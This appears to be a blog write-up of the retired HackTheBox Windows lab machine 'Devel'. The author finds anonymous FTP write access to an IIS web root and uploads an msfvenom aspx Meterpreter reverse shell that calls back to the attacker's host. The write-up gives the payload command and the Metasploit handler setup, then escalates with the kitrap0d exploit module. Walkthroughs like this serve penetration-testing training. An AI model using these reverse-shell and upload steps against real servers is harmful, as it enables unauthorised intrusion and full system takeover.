Devel From HackTheBox
Ftp & windows fun
Hello everyone this is Hac , Today we will be doing Devel from hackthebox which is a easy retired windows box . With a interesting foothold which might be helpful in attack and defense type of war-games for example Hackthebox battleground . So without wasting any time let’s start hacking ……………….
We will start with a quick nmap scan
─$ sudo nmap -sC -sV -p- 10.129.108.142 -oA nmap_all --min-rate 10000
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-25 02:35 EDT
Nmap scan report for 10.129.108.142
Host is up (0.082s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.67 seconds
So there are two services up and running ftp & IIS Server . We have anonymous login at ftp , So let’s check Ftp because we might get some juicy information like clear text password for something or We may be able to upload file’s a ftp which may give us a low privileged shell .
I was able to upload a file called “a.txt” and was able to access the file from the web server . Which mean’s that we can get a shell by uploading a asp file . You maybe be wondering why aspx ? why not php or anything else ? This is because it’s a windows box and Microsoft IIS server is running and PHP is not supported by default . And From a recon we learned about a dir called “aspnet_client” .
Checking a.txt to just make sure that we are able to access it from a web server.
Now I tried to create a revershell with msfvenom first I tried with ‘.asp’ extension but when uploaded the shell and tried to access it from the web-server , I got a error “500 internal server error”. So I tried to create a payload with “.aspx” extension and it worked I got a revershell .
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.16 LPORT=6969 -f aspx > shell.aspxThen I uploaded the final payload on the ftp server & and tried to access it from the web server .
We need to do a little setup with msfconsole in order to get the shell. BTW you can access the shell with netcat also , If you are 1337 hacker .
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf6 exploit(multi/handler) > set LPORT 6969
LPORT => 6969
msf6 exploit(multi/handler) > runNow let’s go back to web server to activate our payload .
And………. we got a revershell let’s gooooooooooooo
It’s time to escalate our privileges to root and completely pwn this box .
Let’s start with basic system enumeration . By running “systeminfo” command and just exploring the file system looking for password or anything which will be informative .
c:\windows\system32\inetsrv>systeminfo
systeminfoHost Name: DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: babis
Registered Organization:
Product ID: 55041-051-0948536-86302
Original Install Date: 17/3/2017, 4:17:31 ��
System Boot Time: 25/10/2022, 9:32:47 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 3.071 MB
Available Physical Memory: 2.419 MB
Virtual Memory: Max Size: 6.141 MB
Virtual Memory: Available: 5.516 MB
Virtual Memory: In Use: 625 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Local Area Connection 4
DHCP Enabled: Yes
DHCP Server: 10.129.0.1
IP address(es)
[01]: 10.129.108.142
[02]: fe80::84e5:a926:a7b4:20d4
[03]: dead:beef::5005:9eb9:f501:6af
[04]: dead:beef::84e5:a926:a7b4:20d4
Hmm from the output of “systeminfo” command we got the hostname , Os Version , And the system architecture , We will note it down cuz it might be helpful . So now let’s try “local_exploit_suggester” which is a post module of metasploit .
First I tried to use “exploit/windows/local/bypassuac_eventvwr” but it failed So , I tried “exploit/windows/local/ms10_015_kitrap0d” which worked I was able to escalate my privileges to root .
Ofc there are many way’s to get root on this box but this one was easiest . And there are some alternative of “local_exploit_suggester” like https://github.com/AonCyberLabs/Windows-Exploit-Suggester . But in this writeup I tried to keep thing’s simple .
I hope you liked it :)
